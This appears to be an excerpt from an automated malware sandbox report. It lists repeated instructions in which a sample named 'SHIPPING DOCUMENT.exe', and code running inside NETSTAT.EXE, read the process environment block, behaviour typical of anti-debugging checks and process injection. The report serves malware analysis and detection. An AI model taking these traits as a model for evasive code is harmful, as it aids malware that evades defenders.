          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC5210 mov eax, dword ptr fs:[00000030h]1_2_00AC5210
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B0927A mov eax, dword ptr fs:[00000030h]1_2_00B0927A
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B7B260 mov eax, dword ptr fs:[00000030h]1_2_00B7B260
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B7B260 mov eax, dword ptr fs:[00000030h]1_2_00B7B260
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B98A62 mov eax, dword ptr fs:[00000030h]1_2_00B98A62
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B54257 mov eax, dword ptr fs:[00000030h]1_2_00B54257
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC9240 mov eax, dword ptr fs:[00000030h]1_2_00AC9240
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC9240 mov eax, dword ptr fs:[00000030h]1_2_00AC9240
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC9240 mov eax, dword ptr fs:[00000030h]1_2_00AC9240
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC9240 mov eax, dword ptr fs:[00000030h]1_2_00AC9240
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B8EA55 mov eax, dword ptr fs:[00000030h]1_2_00B8EA55
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF4BAD mov eax, dword ptr fs:[00000030h]1_2_00AF4BAD
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF4BAD mov eax, dword ptr fs:[00000030h]1_2_00AF4BAD
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF4BAD mov eax, dword ptr fs:[00000030h]1_2_00AF4BAD
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B95BA5 mov eax, dword ptr fs:[00000030h]1_2_00B95BA5
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD1B8F mov eax, dword ptr fs:[00000030h]1_2_00AD1B8F
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD1B8F mov eax, dword ptr fs:[00000030h]1_2_00AD1B8F
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B8138A mov eax, dword ptr fs:[00000030h]1_2_00B8138A
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B7D380 mov ecx, dword ptr fs:[00000030h]1_2_00B7D380
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF2397 mov eax, dword ptr fs:[00000030h]1_2_00AF2397
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFB390 mov eax, dword ptr fs:[00000030h]1_2_00AFB390
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AEDBE9 mov eax, dword ptr fs:[00000030h]1_2_00AEDBE9
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF03E2 mov eax, dword ptr fs:[00000030h]1_2_00AF03E2
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF03E2 mov eax, dword ptr fs:[00000030h]1_2_00AF03E2
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF03E2 mov eax, dword ptr fs:[00000030h]1_2_00AF03E2
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF03E2 mov eax, dword ptr fs:[00000030h]1_2_00AF03E2
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF03E2 mov eax, dword ptr fs:[00000030h]1_2_00AF03E2
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF03E2 mov eax, dword ptr fs:[00000030h]1_2_00AF03E2
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B453CA mov eax, dword ptr fs:[00000030h]1_2_00B453CA
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B453CA mov eax, dword ptr fs:[00000030h]1_2_00B453CA
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B8131B mov eax, dword ptr fs:[00000030h]1_2_00B8131B
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACDB60 mov ecx, dword ptr fs:[00000030h]1_2_00ACDB60
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF3B7A mov eax, dword ptr fs:[00000030h]1_2_00AF3B7A
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF3B7A mov eax, dword ptr fs:[00000030h]1_2_00AF3B7A
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B98B58 mov eax, dword ptr fs:[00000030h]1_2_00B98B58
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACDB40 mov eax, dword ptr fs:[00000030h]1_2_00ACDB40
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACF358 mov eax, dword ptr fs:[00000030h]1_2_00ACF358
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD849B mov eax, dword ptr fs:[00000030h]1_2_00AD849B
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B814FB mov eax, dword ptr fs:[00000030h]1_2_00B814FB
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B46CF0 mov eax, dword ptr fs:[00000030h]1_2_00B46CF0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B46CF0 mov eax, dword ptr fs:[00000030h]1_2_00B46CF0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B46CF0 mov eax, dword ptr fs:[00000030h]1_2_00B46CF0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B98CD6 mov eax, dword ptr fs:[00000030h]1_2_00B98CD6
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFBC2C mov eax, dword ptr fs:[00000030h]1_2_00AFBC2C
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B9740D mov eax, dword ptr fs:[00000030h]1_2_00B9740D
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B9740D mov eax, dword ptr fs:[00000030h]1_2_00B9740D
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B9740D mov eax, dword ptr fs:[00000030h]1_2_00B9740D
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]1_2_00B81C06
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]1_2_00B81C06
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]1_2_00B81C06
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]1_2_00B81C06
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]1_2_00B81C06
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]1_2_00B81C06
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]1_2_00B81C06
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]1_2_00B81C06
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]1_2_00B81C06
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]1_2_00B81C06
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]1_2_00B81C06
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]1_2_00B81C06
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]1_2_00B81C06
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]1_2_00B81C06
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B46C0A mov eax, dword ptr fs:[00000030h]1_2_00B46C0A
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B46C0A mov eax, dword ptr fs:[00000030h]1_2_00B46C0A
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B46C0A mov eax, dword ptr fs:[00000030h]1_2_00B46C0A
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B46C0A mov eax, dword ptr fs:[00000030h]1_2_00B46C0A
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AE746D mov eax, dword ptr fs:[00000030h]1_2_00AE746D
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFA44B mov eax, dword ptr fs:[00000030h]1_2_00AFA44B
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B5C450 mov eax, dword ptr fs:[00000030h]1_2_00B5C450
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B5C450 mov eax, dword ptr fs:[00000030h]1_2_00B5C450
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF35A1 mov eax, dword ptr fs:[00000030h]1_2_00AF35A1
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B905AC mov eax, dword ptr fs:[00000030h]1_2_00B905AC
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B905AC mov eax, dword ptr fs:[00000030h]1_2_00B905AC
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF1DB5 mov eax, dword ptr fs:[00000030h]1_2_00AF1DB5
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF1DB5 mov eax, dword ptr fs:[00000030h]1_2_00AF1DB5
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF1DB5 mov eax, dword ptr fs:[00000030h]1_2_00AF1DB5
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC2D8A mov eax, dword ptr fs:[00000030h]1_2_00AC2D8A
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC2D8A mov eax, dword ptr fs:[00000030h]1_2_00AC2D8A
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC2D8A mov eax, dword ptr fs:[00000030h]1_2_00AC2D8A
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC2D8A mov eax, dword ptr fs:[00000030h]1_2_00AC2D8A
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC2D8A mov eax, dword ptr fs:[00000030h]1_2_00AC2D8A
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF2581 mov eax, dword ptr fs:[00000030h]1_2_00AF2581
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF2581 mov eax, dword ptr fs:[00000030h]1_2_00AF2581
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF2581 mov eax, dword ptr fs:[00000030h]1_2_00AF2581
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF2581 mov eax, dword ptr fs:[00000030h]1_2_00AF2581
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFFD9B mov eax, dword ptr fs:[00000030h]1_2_00AFFD9B
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFFD9B mov eax, dword ptr fs:[00000030h]1_2_00AFFD9B
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B78DF1 mov eax, dword ptr fs:[00000030h]1_2_00B78DF1
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ADD5E0 mov eax, dword ptr fs:[00000030h]1_2_00ADD5E0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ADD5E0 mov eax, dword ptr fs:[00000030h]1_2_00ADD5E0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B8FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B8FDE2
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B8FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B8FDE2
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B8FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B8FDE2
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B8FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B8FDE2
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B46DC9 mov eax, dword ptr fs:[00000030h]1_2_00B46DC9
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B46DC9 mov eax, dword ptr fs:[00000030h]1_2_00B46DC9
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B46DC9 mov eax, dword ptr fs:[00000030h]1_2_00B46DC9
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B46DC9 mov ecx, dword ptr fs:[00000030h]1_2_00B46DC9
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B46DC9 mov eax, dword ptr fs:[00000030h]1_2_00B46DC9
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B46DC9 mov eax, dword ptr fs:[00000030h]1_2_00B46DC9
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B8E539 mov eax, dword ptr fs:[00000030h]1_2_00B8E539
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B4A537 mov eax, dword ptr fs:[00000030h]1_2_00B4A537
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B98D34 mov eax, dword ptr fs:[00000030h]1_2_00B98D34
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF4D3B mov eax, dword ptr fs:[00000030h]1_2_00AF4D3B
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF4D3B mov eax, dword ptr fs:[00000030h]1_2_00AF4D3B
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF4D3B mov eax, dword ptr fs:[00000030h]1_2_00AF4D3B
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]1_2_00AD3D34
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]1_2_00AD3D34
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]1_2_00AD3D34
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]1_2_00AD3D34
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]1_2_00AD3D34
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]1_2_00AD3D34
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]1_2_00AD3D34
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]1_2_00AD3D34
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]1_2_00AD3D34
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]1_2_00AD3D34
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]1_2_00AD3D34
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]1_2_00AD3D34
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]1_2_00AD3D34
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACAD30 mov eax, dword ptr fs:[00000030h]1_2_00ACAD30
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AEC577 mov eax, dword ptr fs:[00000030h]1_2_00AEC577
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AEC577 mov eax, dword ptr fs:[00000030h]1_2_00AEC577
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B03D43 mov eax, dword ptr fs:[00000030h]1_2_00B03D43
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B43540 mov eax, dword ptr fs:[00000030h]1_2_00B43540
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AE7D50 mov eax, dword ptr fs:[00000030h]1_2_00AE7D50
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B446A7 mov eax, dword ptr fs:[00000030h]1_2_00B446A7
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B90EA5 mov eax, dword ptr fs:[00000030h]1_2_00B90EA5
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B90EA5 mov eax, dword ptr fs:[00000030h]1_2_00B90EA5
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B90EA5 mov eax, dword ptr fs:[00000030h]1_2_00B90EA5
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B5FE87 mov eax, dword ptr fs:[00000030h]1_2_00B5FE87
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF16E0 mov ecx, dword ptr fs:[00000030h]1_2_00AF16E0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD76E2 mov eax, dword ptr fs:[00000030h]1_2_00AD76E2
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF36CC mov eax, dword ptr fs:[00000030h]1_2_00AF36CC
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B98ED6 mov eax, dword ptr fs:[00000030h]1_2_00B98ED6
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B7FEC0 mov eax, dword ptr fs:[00000030h]1_2_00B7FEC0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B08EC7 mov eax, dword ptr fs:[00000030h]1_2_00B08EC7
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B7FE3F mov eax, dword ptr fs:[00000030h]1_2_00B7FE3F
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACE620 mov eax, dword ptr fs:[00000030h]1_2_00ACE620
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACC600 mov eax, dword ptr fs:[00000030h]1_2_00ACC600
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACC600 mov eax, dword ptr fs:[00000030h]1_2_00ACC600
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACC600 mov eax, dword ptr fs:[00000030h]1_2_00ACC600
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF8E00 mov eax, dword ptr fs:[00000030h]1_2_00AF8E00
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B81608 mov eax, dword ptr fs:[00000030h]1_2_00B81608
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFA61C mov eax, dword ptr fs:[00000030h]1_2_00AFA61C
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFA61C mov eax, dword ptr fs:[00000030h]1_2_00AFA61C
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD766D mov eax, dword ptr fs:[00000030h]1_2_00AD766D
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AEAE73 mov eax, dword ptr fs:[00000030h]1_2_00AEAE73
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AEAE73 mov eax, dword ptr fs:[00000030h]1_2_00AEAE73
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AEAE73 mov eax, dword ptr fs:[00000030h]1_2_00AEAE73
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AEAE73 mov eax, dword ptr fs:[00000030h]1_2_00AEAE73
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AEAE73 mov eax, dword ptr fs:[00000030h]1_2_00AEAE73
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD7E41 mov eax, dword ptr fs:[00000030h]1_2_00AD7E41
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD7E41 mov eax, dword ptr fs:[00000030h]1_2_00AD7E41
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD7E41 mov eax, dword ptr fs:[00000030h]1_2_00AD7E41
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD7E41 mov eax, dword ptr fs:[00000030h]1_2_00AD7E41
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD7E41 mov eax, dword ptr fs:[00000030h]1_2_00AD7E41
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD7E41 mov eax, dword ptr fs:[00000030h]1_2_00AD7E41
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B8AE44 mov eax, dword ptr fs:[00000030h]1_2_00B8AE44
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B8AE44 mov eax, dword ptr fs:[00000030h]1_2_00B8AE44
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B47794 mov eax, dword ptr fs:[00000030h]1_2_00B47794
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B47794 mov eax, dword ptr fs:[00000030h]1_2_00B47794
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B47794 mov eax, dword ptr fs:[00000030h]1_2_00B47794
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD8794 mov eax, dword ptr fs:[00000030h]1_2_00AD8794
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B037F5 mov eax, dword ptr fs:[00000030h]1_2_00B037F5
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC4F2E mov eax, dword ptr fs:[00000030h]1_2_00AC4F2E
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC4F2E mov eax, dword ptr fs:[00000030h]1_2_00AC4F2E
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFE730 mov eax, dword ptr fs:[00000030h]1_2_00AFE730
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFA70E mov eax, dword ptr fs:[00000030h]1_2_00AFA70E
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFA70E mov eax, dword ptr fs:[00000030h]1_2_00AFA70E
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B5FF10 mov eax, dword ptr fs:[00000030h]1_2_00B5FF10
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B5FF10 mov eax, dword ptr fs:[00000030h]1_2_00B5FF10
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B9070D mov eax, dword ptr fs:[00000030h]1_2_00B9070D
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B9070D mov eax, dword ptr fs:[00000030h]1_2_00B9070D
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AEF716 mov eax, dword ptr fs:[00000030h]1_2_00AEF716
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ADFF60 mov eax, dword ptr fs:[00000030h]1_2_00ADFF60
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B98F6A mov eax, dword ptr fs:[00000030h]1_2_00B98F6A
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ADEF40 mov eax, dword ptr fs:[00000030h]1_2_00ADEF40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03947794 mov eax, dword ptr fs:[00000030h]8_2_03947794
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03947794 mov eax, dword ptr fs:[00000030h]8_2_03947794
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03947794 mov eax, dword ptr fs:[00000030h]8_2_03947794
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D1B8F mov eax, dword ptr fs:[00000030h]8_2_038D1B8F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D1B8F mov eax, dword ptr fs:[00000030h]8_2_038D1B8F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0398138A mov eax, dword ptr fs:[00000030h]8_2_0398138A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0397D380 mov ecx, dword ptr fs:[00000030h]8_2_0397D380
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F2397 mov eax, dword ptr fs:[00000030h]8_2_038F2397
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D8794 mov eax, dword ptr fs:[00000030h]8_2_038D8794
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FB390 mov eax, dword ptr fs:[00000030h]8_2_038FB390
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F4BAD mov eax, dword ptr fs:[00000030h]8_2_038F4BAD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F4BAD mov eax, dword ptr fs:[00000030h]8_2_038F4BAD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F4BAD mov eax, dword ptr fs:[00000030h]8_2_038F4BAD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03995BA5 mov eax, dword ptr fs:[00000030h]8_2_03995BA5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039453CA mov eax, dword ptr fs:[00000030h]8_2_039453CA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039453CA mov eax, dword ptr fs:[00000030h]8_2_039453CA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039037F5 mov eax, dword ptr fs:[00000030h]8_2_039037F5
